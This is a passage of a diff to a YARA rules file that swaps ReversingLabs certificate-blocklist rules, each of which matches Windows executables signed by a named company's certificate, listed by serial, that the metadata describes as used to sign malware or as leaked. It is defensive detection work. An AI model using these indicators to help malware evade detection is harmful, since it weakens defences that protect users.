+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNINFO SISTEMAS LTDA ME" and pe.signatures [ i ] . serial == "37:0c:24:67:c4:1d:60:19:bb:ec:d7:2e:00:c5:d7:3d" and 1445299199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5067339614C5Cc219C489D40420F3Bf9 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "3387f396-01f7-58b1-a5bd-b308105c66d6"
+		id = "6e0cb6f9-0a92-5eb2-b13f-f9c4eb0ae6b1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8902-L8920"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f60753ecb775d664e07e78611568799eaf06fb4742bcef3bf0c28202daf98c50"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1834-L1850"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1716087285a093a3467583f79d7ae9bee641997227e6d4f95047905aedcc97c6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11527,21 +36192,21 @@ rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PIK MOTEL S.R.L." and ( pe.signatures [ i ] . serial == "00:e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" or pe.signatures [ i ] . serial == "e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" ) and 1621468800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D-LINK CORPORATION" and pe.signatures [ i ] . serial == "50:67:33:96:14:c5:cc:21:9c:48:9d:40:42:0f:3b:f9" and 1441238400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6E32531Ae83992F0573120A5E78De271 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "016ad027-bd6a-58e0-9099-341b81dd6f70"
+		id = "37fc58ea-63d4-569d-968f-f4775403b0bb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8922-L8940"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bfcf2fbbd9be97202eeb44c0f81f0a0713d4d30c466f2b170231c7f9df0e9e6d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1852-L1868"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b6d54ea8395c3666906b2e60c30b970c2c1b6f55ded874cbcc22dc79391fb34"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11551,21 +36216,21 @@ rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YAN CHING LIMITED" and ( pe.signatures [ i ] . serial == "00:af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" or pe.signatures [ i ] . serial == "af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" ) and 1622419200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "6e:32:53:1a:e8:39:92:f0:57:31:20:a5:e7:8d:e2:71" and 1451606399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6967A89Bcf6Efef160Aaeebbff376C0A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7f72cd2-0bf4-5aa7-804e-4ae354eda055"
+		id = "d6714f50-600b-5437-8be6-097f7dd93dc7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8942-L8960"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cdb3f1983ed17df22d17c6321bc2ead2c391d70fdca4a9f6f4784f62196b85d0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1870-L1886"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "deb7465e453aa5838f81e15e270abc958a65e1a6051a88a5910244edbe874451"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11575,21 +36240,21 @@ rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOOK CAF\\xC3\\x89, s.r.o." and ( pe.signatures [ i ] . serial == "00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures [ i ] . serial == "8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Chang Yucheng" and pe.signatures [ i ] . serial == "69:67:a8:9b:cf:6e:fe:f1:60:aa:ee:bb:ff:37:6c:0a" and 1451174399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7473D95405D2B0B3A8F28785Ce6E74Ca : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f9983426-9f05-56e2-8ad0-1c5a48ab04be"
+		id = "7f44b9d8-917b-5fc4-9651-cce89358e415"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8962-L8980"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2e004116d0f8df5a625b190127655926336fc74b4cce4ae40cd516a135e5d719"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1888-L1904"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e15b990b13617017ca2d1f8caf03d8ff3785ca9b860bf11f81af5dadf17a9be5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11599,21 +36264,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade Hunters, s. r. o." and ( pe.signatures [ i ] . serial == "00:fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" or pe.signatures [ i ] . serial == "fb:b1:19:8b:d8:bd:db:0d:69:3e:b7:2a:86:13:fe:3f" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dmitrij Emelyanov" and pe.signatures [ i ] . serial == "74:73:d9:54:05:d2:b0:b3:a8:f2:87:85:ce:6e:74:ca" and 1453939199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04F380F97579F1702A85E0169Bbdfd78 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c326fbf0-2d95-5aa1-9ae4-6cb04b9c2212"
+		id = "860027ff-2df2-5519-afde-60ebee270290"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8982-L9000"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6739049a61183d506daf9aaf44a3b15cbf2234c6af307ec95bc07fa3d8501105"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1906-L1922"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "73dc6e36fdaf5c80b33f20f2a9157805ce1d0218f3898104de16522ee9cfd51b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11623,21 +36288,21 @@ rule REVERSINGLABS_Cert_Blocklist_846F77D9919Fc4405Aefe1701309Bd67 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IPM Skupina d.o.o." and ( pe.signatures [ i ] . serial == "00:84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" or pe.signatures [ i ] . serial == "84:6f:77:d9:91:9f:c4:40:5a:ef:e1:70:13:09:bd:67" ) and 1621382400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRANIFLOR" and pe.signatures [ i ] . serial == "04:f3:80:f9:75:79:f1:70:2a:85:e0:16:9b:bd:fd:78" and 1454889599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04D6B8Cc6Dce353Fcf3Ae8A532Be7255 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5dba4570-51d8-5c23-85a5-5de9a048793f"
+		id = "937dd780-52f7-5f27-ac2e-a0245997d449"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9002-L9018"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3c48241e52e58600bfa0385742831dba59d9cbd959cd6853fe8e030f5df79c23"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1924-L1940"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a316ad7f554428d02a850fb3bb04f349d30ecd2ccd4597e7a63461bf5e866e6f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11647,21 +36312,21 @@ rule REVERSINGLABS_Cert_Blocklist_0939C2Bad859C0432E8E98A6C0162C02 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Activ Expeditions ApS" and pe.signatures [ i ] . serial == "09:39:c2:ba:d8:59:c0:43:2e:8e:98:a6:c0:16:2c:02" and 1615939200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADERA" and pe.signatures [ i ] . serial == "04:d6:b8:cc:6d:ce:35:3f:cf:3a:e8:a5:32:be:72:55" and 1451692799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_191322A00200F793 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8828c863-2800-5f66-968e-96a41a071218"
+		id = "4011e54c-ca28-536f-8759-077fcce6d45f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9020-L9036"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8c803111df930056bdc3ef7560f07bf4d255b93286d01ecc55f790e72565ba5d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1942-L1958"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1b816785f86189817c124636e50a0f369ec85cfd898223c4ba43758a877f1cf3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11671,21 +36336,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Fba0E19919Ac50D700Ba60250D02C8B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Diamartis" and pe.signatures [ i ] . serial == "7f:ba:0e:19:91:9a:c5:0d:70:0b:a6:02:50:d0:2c:8b" and 1623196800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRABHAKAR NARAYAN" and pe.signatures [ i ] . serial == "19:13:22:a0:02:00:f7:93" and 1442966399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_451C9D0B413E6E8Df175 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cc8c0cca-1848-5a5e-a421-c5ecdea6ba53"
+		id = "adc832c0-166d-52d1-aeec-2fc92ff52d02"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9038-L9056"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dcb1ac4c7dcbebd0a432515da82e4a97be6c6c2a54f9d642aa8c1a2bcbdce5de"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1960-L1976"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7c94d87f79c9add4d7bf2a63d0774449319aa56cbc631dd9b0f19ed9bb9837d4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11695,21 +36360,21 @@ rule REVERSINGLABS_Cert_Blocklist_A758504E7971869D0Aec2775Fffa03D5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amcert LLC" and ( pe.signatures [ i ] . serial == "00:a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" or pe.signatures [ i ] . serial == "a7:58:50:4e:79:71:86:9d:0a:ec:27:75:ff:fa:03:d5" ) and 1623628800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRASAD UPENDRA" and pe.signatures [ i ] . serial == "45:1c:9d:0b:41:3e:6e:8d:f1:75" and 1442275199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03943858218F35Adb7073A6027555621 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e85434e1-1ef5-5660-8ba6-b35cbbe7510d"
+		id = "fbaf4c7a-5f20-57f7-b6b7-143fdbf0e5c2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9058-L9074"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "22cb71eebbb212a4436847c11c7ca9cefaf118086b024014c12498a6a5953af5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1978-L1994"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "93369d51b73591559494a48fafa5e4f7d46301ecaa379d8de70a70ac4d2d2728"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11719,21 +36384,21 @@ rule REVERSINGLABS_Cert_Blocklist_37A67Cf754Ee5Ae284B4Cf8B9D651604 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTH PROPERTY LTD" and pe.signatures [ i ] . serial == "37:a6:7c:f7:54:ee:5a:e2:84:b4:cf:8b:9d:65:16:04" and 1617321600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RuN APps FOrEver lld" and pe.signatures [ i ] . serial == "03:94:38:58:21:8f:35:ad:b7:07:3a:60:27:55:56:21" and 1480550399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_09813Ee7318452C28A1F6426D1Cee12D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7ec33498-b299-58e0-be42-9e4fb9549e28"
+		id = "db3c1992-b6a1-5aaf-ae3a-c626b531529a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9076-L9092"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "61c49c60fc4fd5d654a6376fcee43e986a5351f085a5652a3c8888774557e053"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1996-L2012"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "89eb019192f822f9fe070403161d81e425fb8acdbc80e55fa516b5607eb8f8c7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11743,21 +36408,21 @@ rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PB03 TRANSPORT LTD." and pe.signatures [ i ] . serial == "11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" and 1619654400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Saly Younes" and pe.signatures [ i ] . serial == "09:81:3e:e7:31:84:52:c2:8a:1f:64:26:d1:ce:e1:2d" and 1455667199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_476Bf24A4B1E9F4Bc2A61B152115E1Fe : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Derusbi malware."
 		author = "ReversingLabs"
-		id = "b7830a3a-ddcc-54ef-84dd-5d4b13863f90"
+		id = "a41e8196-f5ad-5046-82ac-38c6fe753bdb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9094-L9110"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "788abb53ed7974d87c1b1bdbe31dcd3e852ea64745d94780d78d1217ee0206fe"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2014-L2030"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ec0f44d2a7a53ad5653334378b631abde1834ebfcf72efcdcce353c6b9ae17d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11767,21 +36432,21 @@ rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade By International ApS" and pe.signatures [ i ] . serial == "7a:6d:30:a6:eb:2f:a0:c3:36:92:83:72:57:04:ac:4c" and 1619568000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment co.,Ltd" and pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" and 1414454399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Bd55818C5971B63Dc45Cf57Cbeb950B : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Derusbi malware."
 		author = "ReversingLabs"
-		id = "210a0c72-7eb7-5c78-bf5b-1ac292e7fa11"
+		id = "9269cc5c-039e-5d98-ac13-c7b99606e7fa"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9112-L9128"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3b1e244b5f543a05beb2475020aa20dfc723f4dce3a5a0a963db1672d3295721"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2032-L2048"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5aa41a2d6a86a30559b36818602e1bdf2bfd38b799a4869c26c150052d6d788c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11791,21 +36456,21 @@ rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures [ i ] . serial == "67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" and 1622160000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XL Games Co.,Ltd." and pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" and 1371513599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C0B2E9D2Ef909D15270D4Dd7Fa5A4A5 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Derusbi malware."
 		author = "ReversingLabs"
-		id = "9718f290-6ecd-5d67-9013-af99f98fffef"
+		id = "97005464-1219-56d7-bd5c-f047558be1dc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9130-L9146"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4022abb8efbda944e35ff529c5b3b3c9f6370127a945f3eec1310149bb5d06e4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2050-L2066"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9c74eb025bb413503b97ffdba6f19eadecf3789ce3a5d5419f84e32e25c9b5b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11815,21 +36480,21 @@ rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE
 		importance = 25
 
 	condition:
